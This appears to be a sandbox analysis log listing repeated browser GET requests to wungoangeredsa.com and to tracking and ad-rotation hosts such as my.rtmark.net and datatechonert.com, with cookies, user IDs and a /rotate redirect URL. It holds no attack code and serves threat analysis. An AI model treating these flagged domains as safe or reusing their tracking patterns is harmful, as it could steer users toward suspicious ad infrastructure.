Source: global trafficHTTP traffic detected: GET /_next/static/chunks/c2f96434bddabe6e-1736072686539.3a22e244b1dff92a.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /gid.js?userId=1zy28050kovbfyyc4yz4gsq62pkmaxhb HTTP/1.1Host: my.rtmark.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ID=1zy28050kovbfyyc4yz4gsq62pkmaxhb
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/dbb80ba394719d25-1736072686539.0157f5525bb5ad80.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1fd69c98394a3b87-1736072686539.8146f5f4d16f0056.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/a61972911ad09d00-1736072686539.d5eb9d66276548f8.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/ffa1a9ad1af72fff-1736072686539.a773b898c1059c87.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/778e9b206de35143-1736072686539.bfe7610401739abb.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/b79dd0dbaf68b5b4-1736072686539.3b548827f7eb8d6d.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/edad189aa37887a4-1736072686539.43e4db17fc3b4987.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/55b75effc428db6e-1736072686539.cbe69f590e8fc565.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/media/icon-survey.86b78ce0.svg HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/265d60a91fd3d6b8-1736072686539.748820502fe4525b.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /rotate?var=8645117&ymid=615-538bd0d9&click_id=900090192959910233&rhd=1&var_3=M7456757949717807127&oaid=1zy28050kovbfyyc4yz4gsq62pkmaxhb&os_version=10.0.0&btz=America%2FNew_York&bto=300&zz=4292526%3B5128285%3B4326653%3B4949467%3B5381235%3B8372416%3B5381316%3B8372719%3B5381307&uid=1zy28050kovbfyyc4yz4gsq62pkmaxhb HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/593553c1eec4cbba-1736072686539.97c2038dc0b2daf0.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/d6be0b89fa7aeaa3-1736072686539.cf6cc9096c69f504.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/621e8925e817e462-1736072686539.fe6846fd6e13d76b.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/d7be7898798e9f10-1736072686539.f4d9d083e15d3eef.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /log/add?cid=eacf36da-c06d-4d71-90cc-88e30cd4240a&ruid=6ccfebb8-c732-490f-a46c-39244b55a680 HTTP/1.1Host: datatechonert.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/ae2aa467dd9af961-1736072686539.fa66633a9d1758bd.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /stattag.js HTTP/1.1Host: cdntechone.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync-do HTTP/1.1Host: forspearowor.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/20a35a44b4f8b20a-1736072686539.c29d864a1f4963e0.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/f23d1daac59993b6-1736072686539.c517d511b765818c.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9d01a94e442e71b2-1736072686539.1f0bd67ad15ff842.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/media/f_24.a0b04b39.webp HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1fd69c98394a3b87-1736072686539.8146f5f4d16f0056.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/a61972911ad09d00-1736072686539.d5eb9d66276548f8.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/ffa1a9ad1af72fff-1736072686539.a773b898c1059c87.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/edad189aa37887a4-1736072686539.43e4db17fc3b4987.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/dc0be3deba0a9b89-1736072686539.5b2e1a67b76350ce.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/b79dd0dbaf68b5b4-1736072686539.3b548827f7eb8d6d.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/778e9b206de35143-1736072686539.bfe7610401739abb.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/media/m_20.62b047c4.webp HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/media/m_28.094ddc20.webp HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/media/m_13.99d105c0.webp HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/55b75effc428db6e-1736072686539.cbe69f590e8fc565.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/d7be7898798e9f10-1736072686539.f4d9d083e15d3eef.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/ae2aa467dd9af961-1736072686539.fa66633a9d1758bd.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/f23d1daac59993b6-1736072686539.c517d511b765818c.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/20a35a44b4f8b20a-1736072686539.c29d864a1f4963e0.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9d01a94e442e71b2-1736072686539.1f0bd67ad15ff842.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/media/f_24.a0b04b39.webp HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
